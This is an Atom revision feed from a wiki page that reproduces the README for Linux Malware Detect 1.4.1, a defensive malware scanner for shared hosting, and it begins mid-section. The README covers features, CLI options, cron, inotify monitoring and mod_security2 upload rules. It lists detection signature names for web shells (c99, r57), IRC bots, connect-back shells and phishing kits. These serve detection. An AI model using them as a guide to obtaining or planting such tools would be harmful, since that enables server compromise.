threat detection. The following is an analysis of the core MD5 hashes (5,393) &lt;br /&gt;
in LMD 1.4.1 and the percentage of major AV products that currently detect &lt;br /&gt;
the hashes.&lt;br /&gt;
&lt;br /&gt;
KNOWN MALWARE:      1029&lt;br /&gt;
% AV DETECT (AVG):  48&lt;br /&gt;
% AV DETECT (LOW):  58&lt;br /&gt;
% AV DETECT (HIGH): 80&lt;br /&gt;
UNKNOWN MALWARE:    4364&lt;br /&gt;
&lt;br /&gt;
What this information means, is that of the of the 5,393 hashes, 81% or 4,364 &lt;br /&gt;
malware items are NOT detected / known by the top 30 major AV packages. The 1,029 &lt;br /&gt;
malware items that are known / detected have an average of a 48% detection &lt;br /&gt;
rate among major AV packages with a low / high margin of detection at 58 and &lt;br /&gt;
80 percent respective. This clearly demonstrates the lacking capacity in currently&lt;br /&gt;
available tools and why it is important that something fill the void, especially&lt;br /&gt;
in the Linux shared hosted environment.&lt;br /&gt;
&lt;br /&gt;
==FITUR==&lt;br /&gt;
&lt;br /&gt;
- MD5 file hash detection for quick threat identification&lt;br /&gt;
- HEX based pattern matching for identifying threat variants&lt;br /&gt;
- statistical analysis component for detection of obfuscated threats (e.g: base64)&lt;br /&gt;
- integrated detection of ClamAV to use as scanner engine for improved performance&lt;br /&gt;
- integrated signature update feature with -u|--update&lt;br /&gt;
- integrated version update feature with -d|--update-ver&lt;br /&gt;
- scan-recent option to scan only files that have been added/changed in X days&lt;br /&gt;
- scan-all option for full path based scanning&lt;br /&gt;
- checkout option to upload suspected malware to rfxn.com for review / hashing&lt;br /&gt;
- full reporting system to view current and previous scan results&lt;br /&gt;
- quarantine queue that stores threats in a safe fashion with no permissions&lt;br /&gt;
- quarantine batching option to quarantine the results of a current or past scans&lt;br /&gt;
- quarantine restore option to restore files to original path, owner and perms&lt;br /&gt;
- quarantine suspend account option to Cpanel suspend or shell revoke users&lt;br /&gt;
- cleaner rules to attempt removal of malware injected strings&lt;br /&gt;
- cleaner batching option to attempt cleaning of previous scan reports&lt;br /&gt;
- cleaner rules to remove base64 and gzinflate(base64 injected malware&lt;br /&gt;
- daily cron based scanning of all changes in last 24h in user homedirs&lt;br /&gt;
- daily cron script compatible with stock RH style systems, Cpanel &amp;amp; Ensim&lt;br /&gt;
- kernel based inotify real time file scanning of created/modified/moved files&lt;br /&gt;
- kernel inotify monitor that can take path data from STDIN or FILE&lt;br /&gt;
- kernel inotify monitor convenience feature to monitor system users&lt;br /&gt;
- kernel inotify monitor can be restricted to a configurable user html root&lt;br /&gt;
- kernel inotify monitor with dynamic sysctl limits for optimal performance&lt;br /&gt;
- kernel inotify alerting through daily and/or optional weekly reports&lt;br /&gt;
- HTTP upload scanning through mod_security2 inspectFile hook&lt;br /&gt;
- e-mail alert reporting after every scan execution (manual &amp;amp; daily)&lt;br /&gt;
- path, extension and signature based ignore options&lt;br /&gt;
- background scanner option for unattended scan operations&lt;br /&gt;
- verbose logging &amp;amp; output of all actions&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==SUMBER DATA THREAT==&lt;br /&gt;
&lt;br /&gt;
The defining difference with LMD is that it doesn&#039;t just detect malware based &lt;br /&gt;
on signatures/hashes that someone else generated but rather it is an &lt;br /&gt;
encompassing project that actively tracks in the wild threats and generates &lt;br /&gt;
signatures based on those real world threats that are currently circulating.&lt;br /&gt;
&lt;br /&gt;
There are four main sources for malware data that is used to generate LMD &lt;br /&gt;
signatures:&lt;br /&gt;
- Network Edge IPS: The network I manage hosts over 35,000 web sites and as &lt;br /&gt;
such receives a large amount of daily abuse, all of which is logged by our &lt;br /&gt;
network edge IPS. The IPS events are processed to extract malware url&#039;s, &lt;br /&gt;
decode POST payload and base64/gzip encoded abuse data and ultimately that &lt;br /&gt;
malware is retrieved, reviewed, classified and then signatures generated as &lt;br /&gt;
appropriate. The vast majority of LMD signatures have been derived from IPS &lt;br /&gt;
extracted data.&lt;br /&gt;
- Community Data: Data is aggregated from multiple community malware websites &lt;br /&gt;
such as clean-mx and malwaredomainlist then processed to retrieve new &lt;br /&gt;
malware, review, classify and then generate signatures.&lt;br /&gt;
- ClamAV: The HEX &amp;amp; MD5 detection signatures from ClamAV are monitored for &lt;br /&gt;
relevant updates that apply to the target user group of LMD and added to the &lt;br /&gt;
project as appropriate. To date there has been roughly 400 signatures ported &lt;br /&gt;
from ClamAV while the LMD project has contributed back to ClamAV by &lt;br /&gt;
submitting over 1,100 signatures and continues to do so on an ongoing basis.&lt;br /&gt;
- User Submission: LMD has a checkout feature that allows users to submit &lt;br /&gt;
suspected malware for review, this has grown into a very popular feature and &lt;br /&gt;
generates on average about 30-50 submissions per week.&lt;br /&gt;
&lt;br /&gt;
==UPDATE RILIS==&lt;br /&gt;
Updates to the release version of LMD are not automatically installed but can&lt;br /&gt;
be installed using the --update-ver option. There is good reasons that this is&lt;br /&gt;
not done automatically and I really dont feel like listing them so just think&lt;br /&gt;
about it a bit.&lt;br /&gt;
&lt;br /&gt;
The latest changes in the release version can always be viewed at:&lt;br /&gt;
http://www.rfxn.com/appdocs/CHANGELOG.maldetect&lt;br /&gt;
&lt;br /&gt;
==UPDATE SIGNATURE==&lt;br /&gt;
&lt;br /&gt;
The LMD signatures are updated typically once per day or more frequently&lt;br /&gt;
depending on incoming threat data from the LMD checkout feature, IPS malware&lt;br /&gt;
extraction and other sources. The updating of signatures in LMD installations&lt;br /&gt;
is performed daily through the default cron.daily script with the --update&lt;br /&gt;
option, which can be run manually at any time.&lt;br /&gt;
&lt;br /&gt;
An RSS &amp;amp; XML data source is available for tracking malware threat updates:&lt;br /&gt;
RSS Recent Signatures: http://www.rfxn.com/api/lmd&lt;br /&gt;
XML Recent Signatures: http://www.rfxn.com/api/lmd?id=recent&lt;br /&gt;
XML All Signatures:    http://www.rfxn.com/api/lmd?id=all&lt;br /&gt;
&lt;br /&gt;
==THREAT TERDETEKSI==&lt;br /&gt;
&lt;br /&gt;
LMD 1.4.1 has a total of 7,241 (5393 MD5 / 1848 HEX) signatures (before updates),&lt;br /&gt;
below is a listing of the top 60 threats by prevalence detected by LMD.&lt;br /&gt;
&lt;br /&gt;
base64.inject.unclassed    bin.dccserv.irsexxy      bin.fakeproc.Xnuxer&lt;br /&gt;
bin.ircbot.nbot            bin.ircbot.php3          bin.ircbot.unclassed&lt;br /&gt;
bin.pktflood.ABC123        bin.pktflood.osf         bin.trojan.linuxsmalli&lt;br /&gt;
c.ircbot.tsunami           exp.linux.rstb           exp.linux.unclassed&lt;br /&gt;
exp.setuid0.unclassed      gzbase64.inject          html.phishing.auc61&lt;br /&gt;
html.phishing.hsbc         perl.connback.DataCha0s  perl.connback.N2&lt;br /&gt;
perl.cpanel.cpwrap         perl.mailer.yellsoft     perl.ircbot.atrixteam&lt;br /&gt;
perl.ircbot.bRuNo          perl.ircbot.Clx          perl.ircbot.devil&lt;br /&gt;
perl.ircbot.fx29           perl.ircbot.magnum       perl.ircbot.oldwolf&lt;br /&gt;
perl.ircbot.putr4XtReme    perl.ircbot.rafflesia    perl.ircbot.UberCracker&lt;br /&gt;
perl.ircbot.xdh            perl.ircbot.xscan        perl.shell.cbLorD&lt;br /&gt;
perl.shell.cgitelnet       php.cmdshell.c100        php.cmdshell.c99&lt;br /&gt;
php.cmdshell.cih           php.cmdshell.egyspider   php.cmdshell.fx29&lt;br /&gt;
php.cmdshell.ItsmYarD      php.cmdshell.Ketemu      php.cmdshell.N3tshell&lt;br /&gt;
php.cmdshell.r57           php.cmdshell.unclassed   php.defash.buno&lt;br /&gt;
php.exe.globals            php.include.remote       php.ircbot.InsideTeam&lt;br /&gt;
php.ircbot.lolwut          php.ircbot.sniper        php.ircbot.vj_denie&lt;br /&gt;
php.mailer.10hack          php.mailer.bombam        php.mailer.PostMan&lt;br /&gt;
php.phishing.AliKay        php.phishing.mrbrain     php.phishing.ReZulT&lt;br /&gt;
php.pktflood.oey           php.shell.rc99           php.shell.shellcomm&lt;br /&gt;
&lt;br /&gt;
==SHARING DATA THREAT==&lt;br /&gt;
&lt;br /&gt;
I am a firm believer in not reinventing the wheel, for my own sanity or that&lt;br /&gt;
of others. As such all unique theat data is submitted to CYMRU &amp;amp; ClamAV so&lt;br /&gt;
that the open source and anti-malware community at large can grow from this&lt;br /&gt;
project.&lt;br /&gt;
&lt;br /&gt;
==KONFIGURASI==&lt;br /&gt;
&lt;br /&gt;
The configuration of LMD is handled through /usr/local/maldetect/conf.maldet&lt;br /&gt;
and all options are well commented for ease of configuration.&lt;br /&gt;
&lt;br /&gt;
By default LMD has the auto-qurantine of files disabled, this will mean that&lt;br /&gt;
YOU WILL NEED TO ACT on any threats detected or pass the SCANID to the &#039;-q&#039;&lt;br /&gt;
option to batch quarantine the results. To change this please set quar_hits=1&lt;br /&gt;
in conf.maldet.&lt;br /&gt;
&lt;br /&gt;
==PILIHAN YANG DIABAIKAN==&lt;br /&gt;
&lt;br /&gt;
There are four ignore files available and they break down as follows:&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_paths&lt;br /&gt;
A line spaced file for paths that are to be execluded from search results&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 /home/user/public_html/cgi-bin&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_file_ext&lt;br /&gt;
A line spaced file for file extensions to be excluded from search results&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 .js&lt;br /&gt;
 .css&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_sigs&lt;br /&gt;
A line spaced file for signatures that should be removed from file scanning&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 base64.inject.unclassed&lt;br /&gt;
&lt;br /&gt;
/usr/local/maldetect/ignore_inotify&lt;br /&gt;
A line spaced file for regexp paths that are excluded from inotify monitoring&lt;br /&gt;
 Sample ignore entry:&lt;br /&gt;
 ^/home/user$&lt;br /&gt;
 ^/var/tmp/#sql_.*\.MYD$&lt;br /&gt;
&lt;br /&gt;
==PENGGUNAAN CLI==&lt;br /&gt;
&lt;br /&gt;
Once LMD is installed it can be run through the &#039;maldet&#039; command, the &#039;--help&#039;&lt;br /&gt;
option gives a detailed summary of usage options:&lt;br /&gt;
&lt;br /&gt;
    -b, --background&lt;br /&gt;
      Execute operations in the background, ideal for large scans&lt;br /&gt;
      e.g: maldet -b -r /home/?/public_html 7&lt;br /&gt;
&lt;br /&gt;
    -u, --update&lt;br /&gt;
       Update malware detection signatures from rfxn.com&lt;br /&gt;
&lt;br /&gt;
    -d, --update-ver&lt;br /&gt;
       Update the installed version from rfxn.com&lt;br /&gt;
&lt;br /&gt;
    -m, --monitor USERS|PATHS|FILE&lt;br /&gt;
       Run maldet with inotify kernel level file create/modify monitoring&lt;br /&gt;
       If USERS is specified, monitor user homedirs for UID&#039;s &amp;gt; 500&lt;br /&gt;
       If FILE is specified, paths will be extracted from file, line spaced&lt;br /&gt;
       If PATHS are specified, must be comma spaced list, NO WILDCARDS!&lt;br /&gt;
       e.g: maldet --monitor users&lt;br /&gt;
       e.g: maldet --monitor /root/monitor_paths&lt;br /&gt;
       e.g: maldet --monitor /home/mike,/home/ashton&lt;br /&gt;
&lt;br /&gt;
    -k, --kill&lt;br /&gt;
       Terminate inotify monitoring service&lt;br /&gt;
&lt;br /&gt;
    -r, --scan-recent PATH DAYS&lt;br /&gt;
       Scan files created/modified in the last X days (default: 7d, wildcard: ?)&lt;br /&gt;
       e.g: maldet -r /home/?/public_html 2&lt;br /&gt;
&lt;br /&gt;
    -a, --scan-all PATH&lt;br /&gt;
       Scan all files in path (default: /home, wildcard: ?)&lt;br /&gt;
       e.g: maldet -a /home/?/public_html&lt;br /&gt;
&lt;br /&gt;
    -c, --checkout FILE&lt;br /&gt;
       Upload suspected malware to rfxn.com for review &amp;amp; hashing into signatures&lt;br /&gt;
&lt;br /&gt;
    -l, --log&lt;br /&gt;
       View maldet log file events&lt;br /&gt;
&lt;br /&gt;
    -e, --report SCANID email&lt;br /&gt;
       View scan report of most recent scan or of a specific SCANID and optionally&lt;br /&gt;
       e-mail the report to a supplied e-mail address&lt;br /&gt;
       e.g: maldet --report&lt;br /&gt;
       e.g: maldet --report list&lt;br /&gt;
       e.g: maldet --report 050910-1534.21135&lt;br /&gt;
       e.g: maldet --report SCANID user@domain.com&lt;br /&gt;
&lt;br /&gt;
    -s, --restore FILE|SCANID&lt;br /&gt;
       Restore file from quarantine queue to orginal path or restore all items from&lt;br /&gt;
       a specific SCANID&lt;br /&gt;
       e.g: maldet --restore /usr/local/maldetect/quarantine/config.php.23754&lt;br /&gt;
       e.g: maldet --restore 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -q, --quarantine SCANID&lt;br /&gt;
       Quarantine all malware from report SCANID&lt;br /&gt;
       e.g: maldet --quarantine 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -n, --clean SCANID&lt;br /&gt;
       Try to clean &amp;amp; restore malware hits from report SCANID&lt;br /&gt;
       e.g: maldet --clean 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -U, --user USER&lt;br /&gt;
       Set execution under specified user, ideal for restoring from user quarantine or&lt;br /&gt;
       to view user reports.&lt;br /&gt;
       e.g: maldet --user nobody --report&lt;br /&gt;
       e.g: maldet --user nobody --restore 050910-1534.21135&lt;br /&gt;
&lt;br /&gt;
    -co, --config-option VAR1=VALUE,VAR2=VALUE,VAR3=VALUE&lt;br /&gt;
       Set or redefine the value of conf.maldet config options&lt;br /&gt;
       e.g: maldet --config-option email_addr=you@domain.com,quar_hits=1&lt;br /&gt;
&lt;br /&gt;
    -p, --purge&lt;br /&gt;
       Clear logs, quarantine queue, session and temporary data.&lt;br /&gt;
&lt;br /&gt;
==CRON HARIAN==&lt;br /&gt;
&lt;br /&gt;
The cronjob installed by LMD is located at /etc/cron.daily/maldet and is used&lt;br /&gt;
to perform a daily update of signatures, keep the session, temp and quarantine&lt;br /&gt;
data to no more than 14d old and run a daily scan of recent file system changes.&lt;br /&gt;
&lt;br /&gt;
The daily scan supports Ensim virtual roots or standard Linux /home*/user paths,&lt;br /&gt;
such as Cpanel. The default is to just scan the web roots daily, which breaks&lt;br /&gt;
down as /home*/*/public_html or on Ensim /home/virtual/*/fst/var/www/html and&lt;br /&gt;
/home/virtual/*/fst/home/*/public_html.&lt;br /&gt;
&lt;br /&gt;
If you are running monitor mode, the daily scans will be skipped and instead a&lt;br /&gt;
daily report will be issued for all monitoring events. If you need to scan&lt;br /&gt;
additional paths, you should review the cronjob and edit it accordingly.&lt;br /&gt;
&lt;br /&gt;
==INOTIFY MONITORING==&lt;br /&gt;
&lt;br /&gt;
The inotify monitoring feature is designed to monitor users in real-time for&lt;br /&gt;
file creation/modify/move operations. This option requires a kernel that&lt;br /&gt;
supports inotify_watch (CONFIG_INOTIFY) which is found in kernels 2.6.13+&lt;br /&gt;
and CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider&lt;br /&gt;
an inbox upgrade with: http://www.rfxn.com/upgrade-centos-4-8-to-5-3/&lt;br /&gt;
&lt;br /&gt;
There are three modes that the monitor can be executed with and they relate&lt;br /&gt;
to what will be monitored, they are USERS|PATHS|FILES. &lt;br /&gt;
       e.g: maldet --monitor users&lt;br /&gt;
       e.g: maldet --monitor /root/monitor_paths&lt;br /&gt;
       e.g: maldet --monitor /home/mike,/home/ashton&lt;br /&gt;
&lt;br /&gt;
The options break down as follows:&lt;br /&gt;
USERS -  The users option will take the homedirs of all system users that are&lt;br /&gt;
         above inotify_minuid and monitor them. If inotify_webdir is set then&lt;br /&gt;
         the users webdir, if it exists, will only be monitored.&lt;br /&gt;
PATHS -  A comma spaced list of paths to monitor&lt;br /&gt;
FILE  -  A line spaced file list of paths to monitor&lt;br /&gt;
&lt;br /&gt;
Once you start maldet in monitor mode, it will preprocess the paths based on&lt;br /&gt;
the option specified followed by starting the inotify process. The starting of&lt;br /&gt;
the inotify process can be a time consuming task as it needs to setup a monitor&lt;br /&gt;
hook for every file under the monitored paths. Although the startup process can&lt;br /&gt;
impact the load temporarily, once the process has started it maintains all of&lt;br /&gt;
its resources inside kernel memory and has a very small userspace footprint in&lt;br /&gt;
memory or cpu usage.&lt;br /&gt;
&lt;br /&gt;
The scanner component of the monitor watches for notifications from the inotify&lt;br /&gt;
process and batches items to be scanned, by default, every 30 seconds. If you&lt;br /&gt;
need tighter control of the scanning timer, you can edit inotify_stime in&lt;br /&gt;
conf.maldet.&lt;br /&gt;
&lt;br /&gt;
The alerting of file hits under monitor mode is handled through a daily report&lt;br /&gt;
instead of sending an email on every hit. The cron.daily job installed by LMD&lt;br /&gt;
will call an --alert-daily flag and send an alert for the last days hits. There&lt;br /&gt;
is also an --alert-weekly option that can be used, simply edit the cron at&lt;br /&gt;
/etc/cron.daily/maldet and change the --alert-daily to --alert-weekly.&lt;br /&gt;
&lt;br /&gt;
Terminating the inotify monitoring is done by passing the &#039;-k|--kill-monitor&#039;&lt;br /&gt;
option to maldet, it will touch a file handle monitored by maldet and on the&lt;br /&gt;
next waking cycle of the monitor service, it will terminate itself and all&lt;br /&gt;
inotify processes.&lt;br /&gt;
&lt;br /&gt;
==MODSECURITY2 UPLOAD SCANNING==&lt;br /&gt;
&lt;br /&gt;
The support for HTTP upload scanning is provided through mod_security2&#039;s inspectFile hook.&lt;br /&gt;
This feature allows for a validation script to be used in permitting or denying an upload. &lt;br /&gt;
&lt;br /&gt;
The convenience script to faciliate this is called modsec.sh and is located in the&lt;br /&gt;
/usr/local/maldetect installation path. The default setup is to run a standard maldet scan&lt;br /&gt;
with no clamav support, no cleaner rule executions and quarantining enabled; these options&lt;br /&gt;
are set in the interest of performance vs accuracy which is a fair tradeoff. &lt;br /&gt;
&lt;br /&gt;
The scan options can be modified in the modsec.sh file if so desired, the default&lt;br /&gt;
scan options are as follows:&lt;br /&gt;
--config-option quar_hits=1,quar_clean=0,clamav_scan=0 --modsec -a &amp;quot;$file&amp;quot;&lt;br /&gt;
&lt;br /&gt;
There is a tangible performance difference in disabling clamav scanning in this usage&lt;br /&gt;
scenario. The native LMD scanner engine is much faster than the clamav scanner engine&lt;br /&gt;
in single file scans by a wide margin. A single file scan using clamav takes roughly&lt;br /&gt;
3sec on average while the LMD scanner engine takes 0.5sec or less.&lt;br /&gt;
&lt;br /&gt;
To enable upload scanning with mod_security2 you must set enable the public_scan option&lt;br /&gt;
in conf.maldet (public_scan=1) then add the following rules to your mod_security2 &lt;br /&gt;
configuration. These rules are best placed in your modsec2.user.conf file on cpanel servers&lt;br /&gt;
or at the top of the appropraite rules file for your setup.&lt;br /&gt;
&lt;br /&gt;
/usr/local/apache/conf/modsec2.user.conf (or similar mod_security2 rules file):&lt;br /&gt;
SecRequestBodyAccess On&lt;br /&gt;
SecRule FILES_TMPNAMES &amp;quot;@inspectFile /usr/local/maldetect/modsec.sh&amp;quot; \&lt;br /&gt;
                &amp;quot;log,auditlog,deny,severity:2,phase:2,t:none&amp;quot;&lt;br /&gt;
&lt;br /&gt;
A restart of the HTTPd service is required following these changes.&lt;br /&gt;
&lt;br /&gt;
When an upload takes place that is determined to be malware, it will be rejected and an&lt;br /&gt;
entry will appear in the mod_security2 SecAuditLog file. On cpanel servers and most&lt;br /&gt;
configurations this is the modsec_audit.log located under /usr/local/apache/logs or &lt;br /&gt;
/var/log/httpd.&lt;br /&gt;
&lt;br /&gt;
The log entry will appear similar to the following:&lt;br /&gt;
Message: Access denied with code 406 (phase 2). File &amp;quot;/tmp/20111120-....-file&amp;quot; rejected by&lt;br /&gt;
the approver script &amp;quot;/usr/local/maldetect/modsec.sh&amp;quot;: 0 maldet: {HEX}php.cmdshell.r57.317&lt;br /&gt;
/tmp/20111120-....-file [file &amp;quot;/usr/local/apache/conf/modsec2.user.conf&amp;quot;] [line &amp;quot;3&amp;quot;]&lt;br /&gt;
[severity &amp;quot;CRITICAL&amp;quot;]&lt;br /&gt;
&lt;br /&gt;
The default alerting options will apply and an e-mail will be sent when hits are found. This&lt;br /&gt;
can be changed in the modsec.sh script by editing the --config-option values.&lt;br /&gt;
&lt;br /&gt;
To disable alerts append email_alert=0 to the --config-option values:&lt;br /&gt;
--config-option quar_hits=1,quar_clean=0,clamav_scan=0,email_alert=0&lt;br /&gt;
&lt;br /&gt;
To change the e-mail address for alerts on upload hits, append email_addr=you@domain.com&lt;br /&gt;
to the --config-option values:&lt;br /&gt;
--config-option quar_hits=1,quar_clean=0,clamav_scan=0,email_addr=you@domain.com&lt;br /&gt;
&lt;br /&gt;
The nature of uploads is such that they are performed either under the user that the HTTP&lt;br /&gt;
service is running as or under that of a system user in an suexec style setup (i.e: phpsuexec).&lt;br /&gt;
This required a change to the way LMD stores session, temporary and quarantine data to allow&lt;br /&gt;
for non-root users to perform scans.&lt;br /&gt;
&lt;br /&gt;
Given that the maldetect installation path is owned by user root, we either need to set a pub&lt;br /&gt;
path world writable (777) or populate the pub path with user owned paths. It was undesirable&lt;br /&gt;
to set any path world writable and as such a feature to populate path data was created. This&lt;br /&gt;
feature is controlled with the --mkpubpaths flag and is executed from cron every 10 minutes,&lt;br /&gt;
it will only execute if the public_scan variable is enabled in conf.maldet. As such, it is&lt;br /&gt;
important to make sure the public_scan variable is set to enabled (1) in conf.maldet and it is&lt;br /&gt;
advised to run &#039;maldet --mkpubpaths&#039; manually to prepopulate the user paths. There after, the&lt;br /&gt;
cron will ensure new users have paths created no later than 10 minutes after creation.&lt;br /&gt;
&lt;br /&gt;
All non-root scans, such as those performed under mod_security2, will be stored under the&lt;br /&gt;
/usr/local/maldetect/pub/username directory tree. The quarantine paths are relative to the user&lt;br /&gt;
that exectues the scan, so user nobody would be under pub/nobody/quar/. The actual paths&lt;br /&gt;
for where files are quarantined and the user which executed the scan, can be verified in the&lt;br /&gt;
e-mail reports for upload hits.&lt;br /&gt;
&lt;br /&gt;
To restore files quarantined under non-root users, you must pass the -U|--user option to LMD,&lt;br /&gt;
for example if user nobody quarantined a file you would like to restore, it can be restored as&lt;br /&gt;
follows:&lt;br /&gt;
maldet --user nobody /usr/local/maldetect/pub/nobody/quar/20111120-file-SFwTeu.22408&lt;br /&gt;
&lt;br /&gt;
Or, as always the scan ID can be used to restore&lt;br /&gt;
maldet --user nobody 112011-0032.13771&lt;br /&gt;
&lt;br /&gt;
==CLEANER RULES==&lt;br /&gt;
&lt;br /&gt;
The cleaner function looks for signature-named rules under the clean/ path,&lt;br /&gt;
these rules can consist of any command that is designed to clean a file of&lt;br /&gt;
malware. A cleaner rule must result in a file being able to pass a scan&lt;br /&gt;
without tripping a HIT otherwise it will classify the clean action as FAILED.&lt;br /&gt;
&lt;br /&gt;
Let us assume for a moment we have malware that we want to clean and it trips&lt;br /&gt;
with the signature &amp;quot;{HEX}php.cmdshell.r57.89&amp;quot;. The actual signature string in&lt;br /&gt;
this is &amp;quot;php.cmdshell.r57&amp;quot;, the &amp;quot;{HEX}&amp;quot; just defines the format and &amp;quot;.89&amp;quot; is&lt;br /&gt;
the variant number. So, to create a clean rule for php.cmdshell.r57 we would&lt;br /&gt;
add a file &#039;clean/php.cmdshell.r57&#039; and this would be executed against any&lt;br /&gt;
file that hits on the signature of the same name.&lt;br /&gt;
&lt;br /&gt;
The actual contents of the rule should be a single line command that will be&lt;br /&gt;
executed against the hit file, for example the execution looks something like:&lt;br /&gt;
&lt;br /&gt;
YOUR_COMMAND MALWARE_FILE&lt;br /&gt;
&lt;br /&gt;
So, for a string based malware injection you could easily throw in a &#039;sed -i&#039;&lt;br /&gt;
into the rule file with the appropriate pattern to strip the string(s) from&lt;br /&gt;
the file. Once the clean command has run, a rescan will be performed on the&lt;br /&gt;
file and if it causes causes a hit, the clean will be marked as FAILED. A&lt;br /&gt;
successful clean ALWAYS results in the file being restored if possible to&lt;br /&gt;
its original path, owner and mode.&lt;br /&gt;
&lt;br /&gt;
An important note is that the cleaner function is a subfunction of the&lt;br /&gt;
quarantine, so if the quarantine is disabled then by default, malware hits&lt;br /&gt;
will not have clean attempts made. There are two ways around this, apart from&lt;br /&gt;
the obvious of turning on quarantine and rescanning (which is a waste of time).&lt;br /&gt;
The best way is to enable the quarantine and then use the -q|--quarantine flag&lt;br /&gt;
to batch through the scan results, which will quarantine and clean files. The&lt;br /&gt;
second is to use the -n|--clean flag which will try to clean files in place,&lt;br /&gt;
be that in the quarantine or the files original path, wherever it can be found.&lt;br /&gt;
&lt;br /&gt;
e.g: maldet -q SCANID&lt;br /&gt;
e.g: maldet --clean SCANID&lt;br /&gt;
&lt;br /&gt;
==Pranala Luar==&lt;br /&gt;
* http://www.rfxn.com/appdocs/README.maldetect&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Linux_Malware_Detect&amp;diff=28746</id>
		<title>Linux Malware Detect</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Linux_Malware_Detect&amp;diff=28746"/>
		<updated>2011-12-25T09:40:09Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: Linux Malware Detect v1.4.1             (C) 2002-2011, R-fx Networks &amp;lt;proj@r-fx.org&amp;gt;             (C) 2011, Ryan MacDonald &amp;lt;ryan@r-fx.org&amp;gt; inotifywait (C) 2007, Rohan McGovern &amp;lt;rohan@mcgove...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Linux Malware Detect v1.4.1&lt;br /&gt;
            (C) 2002-2011, R-fx Networks &amp;lt;proj@r-fx.org&amp;gt;&lt;br /&gt;
            (C) 2011, Ryan MacDonald &amp;lt;ryan@r-fx.org&amp;gt;&lt;br /&gt;
inotifywait (C) 2007, Rohan McGovern &amp;lt;rohan@mcgovern.id.au&amp;gt;&lt;br /&gt;
This program may be freely redistributed under the terms of the GNU GPL v2&lt;br /&gt;
&lt;br /&gt;
::::::::::::::::::::::::::::::::::&lt;br /&gt;
&lt;br /&gt;
:: CONTENTS ::&lt;br /&gt;
.: 1 [ DESCRIPTION ]&lt;br /&gt;
.: 2 [ FEATURES ]&lt;br /&gt;
.: 3 [ THREAT SOURCE DATA ]&lt;br /&gt;
.: 4 [ RELEASE UPDATES ]&lt;br /&gt;
.: 4.1 [ SIGNATURE UPDATES ]&lt;br /&gt;
.: 5 [ DETECTED THREATS ]&lt;br /&gt;
.: 6 [ THREAT SHARING ]&lt;br /&gt;
.: 7 [ CONFIGURATION ]&lt;br /&gt;
.: 8 [ IGNORE OPTIONS ]&lt;br /&gt;
.: 9 [ CLI USAGE ]&lt;br /&gt;
.: 10 [ CRON DAILY ]&lt;br /&gt;
.: 11 [ INOTIFY MONITORING ]&lt;br /&gt;
.: 12 [ MODSECURITY2 UPLOAD SCANNING ]&lt;br /&gt;
.: 13 [ CLEANER RULES ]&lt;br /&gt;
&lt;br /&gt;
::::::::::::::::::::::::::::::::::&lt;br /&gt;
&lt;br /&gt;
.: 1 [ DESCRIPTION ]&lt;br /&gt;
&lt;br /&gt;
Linux Malware Detect (LMD) is a malware scanner for Linux released under the &lt;br /&gt;
GNU GPLv2 license, that is designed around the threats faced in shared hosted &lt;br /&gt;
environments. It uses threat data from network edge intrusion detection &lt;br /&gt;
systems to extract malware that is actively being used in attacks and &lt;br /&gt;
generates signatures for detection. In addition, threat data is also derived &lt;br /&gt;
from user submissions with the LMD checkout feature and from malware &lt;br /&gt;
community resources. The signatures that LMD uses are MD5 file hashes and HEX &lt;br /&gt;
pattern matches, they are also easily exported to any number of detection &lt;br /&gt;
tools such as ClamAV.&lt;br /&gt;
&lt;br /&gt;
The driving force behind LMD is that there is currently limited availability &lt;br /&gt;
of open source/restriction free tools for Linux systems that focus on malware &lt;br /&gt;
detection and more important that get it right. Many of the AV products that &lt;br /&gt;
perform malware detection on Linux have a very poor track record of detecting &lt;br /&gt;
threats, especially those targeted at shared hosted environments.&lt;br /&gt;
&lt;br /&gt;
The threat landscape in shared hosted environments is unique from that of the &lt;br /&gt;
standard AV products detection suite in that they are detecting primarily OS &lt;br /&gt;
level trojans, rootkits and traditional file-infecting viruses but missing &lt;br /&gt;
the ever increasing variety of malware on the user account level which serves &lt;br /&gt;
as an attack platform.&lt;br /&gt;
&lt;br /&gt;
Using the CYMRU malware hash registry, which provides malware detection data &lt;br /&gt;
for 30 major AV packages, we can demonstrate this short coming in current &lt;br /&gt;
threat detection. The following is an analysis of the core MD5 hashes (5,393) &lt;br /&gt;
in LMD 1.4.1 and the percentage of major AV products that currently detect &lt;br /&gt;
the hashes.&lt;br /&gt;
&lt;br /&gt;
KNOWN MALWARE:      1029&lt;br /&gt;
% AV DETECT (AVG):  48&lt;br /&gt;
% AV DETECT (LOW):  58&lt;br /&gt;
% AV DETECT (HIGH): 80&lt;br /&gt;
UNKNOWN MALWARE:    4364&lt;br /&gt;
&lt;br /&gt;
What this information means, is that of the of the 5,393 hashes, 81% or 4,364 &lt;br /&gt;
malware items are NOT detected / known by the top 30 major AV packages. The 1,029 &lt;br /&gt;
malware items that are known / detected have an average of a 48% detection &lt;br /&gt;
rate among major AV packages with a low / high margin of detection at 58 and &lt;br /&gt;
80 percent respective. This clearly demonstrates the lacking capacity in currently&lt;br /&gt;
available tools and why it is important that something fill the void, especially&lt;br /&gt;
in the Linux shared hosted environment.&lt;br /&gt;
&lt;br /&gt;
.: 2 [ FEATURES ]&lt;br /&gt;
&lt;br /&gt;
- MD5 file hash detection for quick threat identification&lt;br /&gt;
- HEX based pattern matching for identifying threat variants&lt;br /&gt;
- statistical analysis component for detection of obfuscated threats (e.g: base64)&lt;br /&gt;
- integrated detection of ClamAV to use as scanner engine for improved performance&lt;br /&gt;
- integrated signature update feature with -u|--update&lt;br /&gt;
- integrated version update feature with -d|--update-ver&lt;br /&gt;
